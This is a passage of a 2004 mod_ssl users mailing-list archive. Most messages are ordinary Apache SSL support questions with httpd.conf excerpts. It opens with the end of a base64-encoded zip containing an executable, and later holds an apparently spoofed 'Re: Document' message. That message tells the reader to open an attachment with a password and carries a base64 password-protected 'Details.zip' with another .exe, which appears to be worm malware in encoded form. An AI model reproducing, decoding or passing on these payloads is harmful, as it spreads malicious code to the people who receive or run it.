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
AAAAAQABADkAAADsUwAAAAA=

----------wtusflnygrusdicutdeh--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 21 02:02:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4E358A8962; Sun, 21 Mar 2004 02:02:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vetortho.com (mail.digitalfacet.com [216.36.78.165])
	by master.modssl.org (Postfix) with ESMTP id 75262A8940
	for ; Sun, 21 Mar 2004 02:02:03 +0100 (CET)
Received: from [68.126.199.210] (HELO badger)
  by vetortho.com (CommuniGate Pro SMTP 4.1.8)
  with ESMTP-TLS id 1317542 for modssl-users@modssl.org; Sat, 20 Mar 2004 17:00:50 -0800
From: "Theodore Jencks" 
To: 
Subject: Apache not spawning MinSpareServers 16
Date: Sat, 20 Mar 2004 17:02:14 -0800
Organization: DigitalFacet, Inc.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Thread-Index: AcQO4CWecNCRw09XRyaiK2K4LCIlFw==
Message-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Theodore Jencks" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm having an interesting problem with Apache after compiling and installing
the latest mod_ssl DSO: libssl.so in my apache server.

I am using the following enviorment:
OS:		RedHat Linux 8
Platform:	x86 (athlon processor)
Openssl:	0.9.7d (compiled and installed w/ clean sources)
Apache:	1.3.29 (compiled and installed w/ clean sources)
Mod_ssl:	2.8.16-1.3.29 (compiled and installed w/ clean sources)

The problem occurs when I start Apache with SSL enabled it seems to ignore
the "MinSpareServers 16" directive and only starts up one process.  Once I
access one of the sites that my Apache server handles it spawns another
child process but still does not spawn 16 child processes like I'd like.
I'm not quite sure what's going on and I haven't found a mention of this
issue on the mailing lists thus far; though perhaps I wasn't using the right
key words to search with:-)  Thanks in advance to any help u'all might
provide.

Another interesting point is that this only happens when I start apache with
httpd -DSSL. Otherwise even if I start the apache server normally and
explicitly LoadModule libssl.so apache starts up the correct amount of
servers.

Best regards,
Theo


I start Apache by calling "/etc/init.d/httpd start":

#Options passed to httpd at start
#All this does is pass httpd -DSSL to start Apache with SSL
if [ -f /etc/sysconfig/httpd ]; then
        . /etc/sysconfig/httpd
fi

start() {
        echo -n $"Starting $prog: "
        daemon $httpd $OPTIONS
        RETVAL=$?
        echo
        [ $RETVAL = 0 ] && touch /var/lock/subsys/httpd
        return $RETVAL
}

Top part of httpd.conf looks like this:

ServerType standalone
ServerRoot "/inet/www/apache"
PidFile /var/run/httpd/httpd.pid
ScoreBoardFile /var/log/apache/httpd.scoreboard
ResourceConfig /dev/null
AccessConfig /dev/null
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 15
MinSpareServers 16
MaxSpareServers 32
StartServers 64
MaxClients 256
MaxRequestsPerChild 0
Listen *:80

Listen *:443



SSL Global Context in httpd.conf looks like this:


AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin
SSLSessionCache none
SSLSessionCacheTimeout  300
SSLMutex sem
SSLRandomSeed startup file:/dev/urandom 1024
SSLRandomSeed connect file:/dev/urandom 1024
SSLLog /var/log/httpd/ssl_engine.log
SSLLogLevel info

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 21 03:50:12 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 60C14A8948; Sun, 21 Mar 2004 03:50:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vetortho.com (mail.digitalfacet.com [216.36.78.165])
	by master.modssl.org (Postfix) with ESMTP id 5B8D6A893A
	for ; Sun, 21 Mar 2004 03:49:55 +0100 (CET)
Received: from [68.126.199.210] (HELO badger)
  by vetortho.com (CommuniGate Pro SMTP 4.1.8)
  with ESMTP-TLS id 1317588 for modssl-users@modssl.org; Sat, 20 Mar 2004 18:48:41 -0800
From: "Theodore Jencks" 
To: 
Subject: FW: Apache not spawning MinSpareServers 16
Date: Sat, 20 Mar 2004 18:49:17 -0800
Organization: DigitalFacet, Inc.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Thread-Index: AcQO4CWecNCRw09XRyaiK2K4LCIlFwADuOtA
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Message-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Theodore Jencks" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I'm having an interesting problem with Apache after compiling and installing
the latest mod_ssl DSO: libssl.so in my apache server.

I am using the following enviorment:
OS:		RedHat Linux 8
Platform:	x86 (athlon processor)
Openssl:	0.9.7d (compiled and installed w/ clean sources)
Apache:	1.3.29 (compiled and installed w/ clean sources)
Mod_ssl:	2.8.16-1.3.29 (compiled and installed w/ clean sources)

The problem occurs when I start Apache with SSL enabled it seems to ignore
the "MinSpareServers 16" directive and only starts up one process.  Once I
access one of the sites that my Apache server handles it spawns another
child process but still does not spawn 16 child processes like I'd like.
I'm not quite sure what's going on and I haven't found a mention of this
issue on the mailing lists thus far; though perhaps I wasn't using the right
key words to search with:-)  Thanks in advance to any help u'all might
provide.

Another interesting point is that this only happens when I start apache with
httpd -DSSL. Otherwise even if I start the apache server normally and
explicitly LoadModule libssl.so apache starts up the correct amount of
servers.

Best regards,
Theo


I start Apache by calling "/etc/init.d/httpd start":

#Options passed to httpd at start
#All this does is pass httpd -DSSL to start Apache with SSL
if [ -f /etc/sysconfig/httpd ]; then
        . /etc/sysconfig/httpd
fi

start() {
        echo -n $"Starting $prog: "
        daemon $httpd $OPTIONS
        RETVAL=$?
        echo
        [ $RETVAL = 0 ] && touch /var/lock/subsys/httpd
        return $RETVAL
}

Top part of httpd.conf looks like this:

ServerType standalone
ServerRoot "/inet/www/apache"
PidFile /var/run/httpd/httpd.pid
ScoreBoardFile /var/log/apache/httpd.scoreboard
ResourceConfig /dev/null
AccessConfig /dev/null
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 15
MinSpareServers 16
MaxSpareServers 32
StartServers 64
MaxClients 256
MaxRequestsPerChild 0
Listen *:80

Listen *:443



SSL Global Context in httpd.conf looks like this:


AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin
SSLSessionCache none
SSLSessionCacheTimeout  300
SSLMutex sem
SSLRandomSeed startup file:/dev/urandom 1024
SSLRandomSeed connect file:/dev/urandom 1024
SSLLog /var/log/httpd/ssl_engine.log
SSLLogLevel info

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 21 11:47:46 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6D063A8948; Sun, 21 Mar 2004 11:47:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web20725.mail.yahoo.com (web20725.mail.yahoo.com [216.136.226.107])
	by master.modssl.org (Postfix) with SMTP id 989D9A893A
	for ; Sun, 21 Mar 2004 11:47:27 +0100 (CET)
Message-ID: <20040321104719.49513.qmail@web20725.mail.yahoo.com>
Received: from [81.70.76.211] by web20725.mail.yahoo.com via HTTP; Sun, 21 Mar 2004 02:47:19 PST
Date: Sun, 21 Mar 2004 02:47:19 -0800 (PST)
From: Bo Boe 
Subject: Apache, multiple (ip-based) vhosts and client authentication howto?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bo Boe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I want to setup two webservers with different domains,
lets say www.domain1.com
and www.domain2.com

I want to host these webservers on a single apache
server using vhosts, but ............... There are two
different known clients accessing these webservers:
client1 and client2.

Now I want to issue an certificate certificate1 to
client1 which allows him to authenticate himself to
www.domain1.com using SSLVerifyClient require and

The other user get a certificate2 which allows him to
authenticate himself to www.domain2.com

client1 cannot access www.domain2.com and client2
cannot access www.domain1.com since they don't have
the apropriate certificates

Could anyone provide me with an example of vhosts.conf
file how to do this or at least explain how I could
make one myself. Thanks

__________________________________
Do you Yahoo!?
Yahoo! Finance Tax Center - File online. File on time.
http://taxes.yahoo.com/filing.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 21 22:35:17 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 85011A8948; Sun, 21 Mar 2004 22:35:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vetortho.com (mail.digitalfacet.com [216.36.78.165])
	by master.modssl.org (Postfix) with ESMTP id 87E8FA893A
	for ; Sun, 21 Mar 2004 22:35:16 +0100 (CET)
Received: from [68.126.199.210] (HELO badger)
  by vetortho.com (CommuniGate Pro SMTP 4.1.8)
  with ESMTP-TLS id 1317723 for modssl-users@modssl.org; Sun, 21 Mar 2004 13:34:00 -0800
From: "Theodore Jencks" 
To: 
Subject: Test email to the list PLEASE IGNORE
Date: Sun, 21 Mar 2004 13:35:12 -0800
Organization: DigitalFacet, Inc.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Thread-Index: AcQPjGRBhEettBvtR/aIyMgITXPv9A==
Message-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Theodore Jencks" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Test of strange mailing list problem!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 23 08:34:50 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DEAD2A8995; Tue, 23 Mar 2004 08:34:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Baleine.org (m92.net81-64-169.noos.fr [81.64.169.92])
	by master.modssl.org (Postfix) with SMTP id 3ECDCA893A
	for ; Tue, 23 Mar 2004 08:34:45 +0100 (CET)
Date: Tue, 23 Mar 2004 08:34:37 +0100
To: modssl-users@modssl.org
Subject: Re: Document
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------unobhhoemjhekgqnrbhe"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------unobhhoemjhekgqnrbhe
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


See attach.





Password - 





----------unobhhoemjhekgqnrbhe
Content-Type: image/jpeg; name="wgwalayggu.jpeg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="wgwalayggu.jpeg"
Content-ID: 

/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRof
Hh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwh
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAAR
CAARADsDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAA
AgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK
FhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWG
h4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl
5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREA
AgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYk
NOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE
hYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk
5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD3+oLu6isrZ55jhVwMDqxPAA9STgD61PWJ
4ihjljt2M99FNEWkh+zW7SqXxgb8Rvjrxx9OlRUk4xbRpSipTSZFp2t3eoeGf7UJs7ZmkfDT
E+XHGHK5OD8xwPUAnuKrt4nuDp1kWhitL24tnuXFwrMkaqQOQvIBznPYZJ6YqLT7qXStBsrG
3W4nkiQLKJ9PuAvTkKVi6A+oOR19azf7Niht4Y4JL2Rzpr6dLJLp1yMKxzuUbDnGSMccd+K4
XVnyqz1trtvp/wAH+rHfGlT5neOl9N9tf+B/VzoLzX5I75bSB7RJI0ieZpdxQ7zgKGH3fqRj
lRjnifUNUu7PWbK2jSCWK4cIYlJMwGDuk9Aq4HrnPbHPNz6XYs91bwx3osbyO2SUNYXO9Vhx
gL+753AAZyMY71qT3Emp6vZB/Pjt7e6E0TrY3COflK7G3JgDJOWzjHYdapVZu93rddfP/KxL
pQVrLSz6eS/W51FFFFd55wUUUUAFFFFABRRRQAUUUUAf/9k=

----------unobhhoemjhekgqnrbhe
Content-Type: application/octet-stream; name="Details.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Details.zip"

UEsDBAoAAQAIAOBCdzDzpHTz61UAAKFSAAAKAAAAaGl4eGRtLmV4ZbIv6lgsE1O14tDYqRPt
J6HFv0UkXeP+UZR3jOKxxyBvdEV/gTsD5+LrN+ZbJ7EoS/6zrd1KBbrLQ8qLVy8OAF8zaU7F
7med8hvIYK1EYIbUanZ36Mzs69TLUhU4PE55cKhWt8PDmWmggZIfMDbrV3rGttAlImAgV843
